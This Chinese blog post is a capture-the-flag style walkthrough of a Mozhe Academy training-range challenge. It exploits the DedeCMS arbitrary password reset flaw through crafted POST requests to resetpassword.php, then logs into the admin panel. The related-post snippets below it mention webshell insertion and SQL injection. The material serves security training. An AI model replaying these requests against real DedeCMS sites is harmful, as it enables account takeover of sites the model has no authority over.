墨者学院-在线靶场 - CMS系统漏洞分析溯源(第7题)

最新推荐文章于 2024-05-19 18:10:52 发布
最新推荐文章于 2024-05-19 18:10:52 发布
阅读量1.4k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a519395243/article/details/85244791
版权

墨者 在线靶场 CMS系统漏洞分析溯源(第7题)

DEDECMS 任意用户密码重置漏洞利用

 

开始用 admin 发现前台出错,后台也登录不了,改用 test 帐号

利用burp 抓包改 Post

http://219.153.49.228:47764/member/resetpassword.php

POST /member/resetpassword.php HTTP/1.1
dopost=safequestion&safequestion=0.0&safeanswer=&id=2  (2为 test 的ID)

image.png

forward 之后 获取跳转页面 里面的 key 值

image.png

再用 burp post   
 

 /member/resetpassword.php 
dopost=getpasswd&setp=2&id=2&userid=test&key=5S3NSMNQ&pwd=123456&pwdok=123456


key  为刚刚获取的 key 值,重置密码为 123456

 

用 test  密码 123456 登录,登录成功个人基本资料 有电子邮箱

用 电子邮箱 登录 后台 http://219.153.49.228:47764/dede/login.php

帐号 admin  密码 电子邮箱

登录成功,key 在 网站根目录下

D丶D
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院-CMS系统漏洞分析溯源(第7)
JimWu的博客
09-04 940
CMS系统漏洞分析溯源(第7) 难易程度:★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先在网上查一下dedecms的漏洞。 知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫,然后打开burpsuite,访问/member/resetpassword.php,截包。 我们send to repeater,修改get的参数 ?...
墨者学院靶场(http请求头注入)
DMXA的博客
10-07 131
【代码】墨者学院靶场(http请求头注入)
墨者学院(POST注入)
2301_77578012的博客
05-19 404
使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具。发现存在注入点,并且给出了我们具体执行的payload格式。(如果大家对工具有需求的话可以q我哈)参数后所跟数据也可以通过抓包获取。1.墨者靶场(POST注入)2.sqlmap工具(主要)3.burpsuite工具。,在需要测试参数后加。
墨者学院 - CMS系统漏洞分析溯源(第2)
多崎巡礼的博客
08-06 1335
登陆后台。 使用admin.php就可以进入后台 用户名密码都是自动填上的,直接登陆就可以。 界面->模板风格->详细列表->search->index.html->将一句话木马添加进去后保存。      ...
DedecmsV5.7任意代码执行漏洞复现(靶场及工具已打包)
爱国小白帽
12-29 2449
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归爱国小白帽所有 准备 靶场及工具打包在公众号,回复“dede”领取,也可单独下载 dedecmsV5.7靶机源码 冰蝎3.0window版 可公网访问的云端服务器(如果没有可用本地虚拟机模拟) phpstudy D盾(次要) FinalShell(次要) 首先将靶机解压,进入install目录,将install_lock.txt文件删除,inde.
墨者学院-CMS系统漏洞分析溯源(第7)——亲妈级教程
ploto_cs的博客
09-30 1122
墨者学院-CMS系统漏洞分析溯源(第7)——亲妈级教程 方法一: 1.通过探测发现该靶场为DEDE-CMS 靶场为20180109 http://host:post/data/admin/ver.txt 为DEDE版本号位置 2.构造请求获取重置密码链接 请求1:http://219.153.49.228:47258/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=1 重置密
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
php漏洞打包
05-13
网上弄到的php漏洞利用代码。
爱青檬CMS音乐程序系统
04-04
爱青檬CMS是基于CSCMS V3.5进行修改的音乐网站系统,添加了更全面的标签与插件功能,优化了大部分代码。 如果你正使用CSCMS V3.5 系统的可以直接打包好数据库文件导入到 爱青檬CMS V3.57 系统中。
CMSEASY逻辑漏洞思路剖析
Ms08067安全实验室
05-13 2379
本周分享知识星球里面的cmseasy逻辑漏洞,里面涉及了抓包教程比较简单,适合新手练习。这次跟大家分享其中的思路。本文作者:付聪(MS08067安全实验室核心)CMSEASY逻辑漏洞一登...
墨者学院——登录密码重置漏洞分析溯源
人若无名,便可专心练剑
10-07 177
抓包后,把17开头的电话号码改成了18开头的,然后获取验证码。发现没有验证码,所以要用18868345809拿验证。然后用17开头的电话号码重置,用18开头的验证码。先用17101304128的进行抓包。进行重置密码,拿到key。
多节点靶场(1)--Yxcms靶场分析
u012335061的博客
11-22 2959
**** 多节点靶场(1)–Yxcms靶场分析** **链接: 任务:找找flag,一共有三个: 已经知道是yxcms,可以去网上看一下,这个cms爆出过什么漏洞,可以复现一下 Yxcms登录后台地址:http://192.168.100.130/index.php?r=admin/index/login Yxcms后台登录页面存在弱口令,默认用户密码是...
CTF-BeesCMS系统漏洞分析溯源
asd158923328的博客
08-21 4609
根据意 漏洞原因:因为BeesCMS后台登陆页面存在sql注入,可以被用来写入一句话木马或者查看管理员密码 进入环境,通过御剑工具扫描网站目录,发现/admin/login.php 首先在用户名 中 输入 ‘ 出现了报错, 确认后台登陆页面的user 有存在sql注入。 然后输入 ‘ or 1=1 # 就返回了正常的登陆失败的页面。 sql 回显可以看出有五个字段 所以尝试 ‘ unio...
墨者学院-CMS系统漏洞分析溯源(第8)
JimWu的博客
09-04 484
CMS系统漏洞分析溯源(第8) 难易程度:★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、御剑 1.打开靶场,首先使用御剑扫一扫。 首先访问/member/index.php,打不开。然后访问/manager/login.php,找到后台登录界面。 2.尝试用户名和密码均为admin,提示密码不正确。再尝试用户名和密码均为test,提示用户不存在。 可以确定用户名为admin,密码...
墨者学院 - WEB站点访问者身份识别
多崎巡礼的博客
07-26 903
进入链接一脸懵逼。。。 进入  ip/robots.txt 搜索robot相关知识点 发现robots.txt仅允许必应爬取 使用burpsuit 截包,更改user-agent为必应的 Bingbot 进入六合彩广告。。。这不符合共产主义。。。下拉一看嗯,key粗线了!洋气!...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值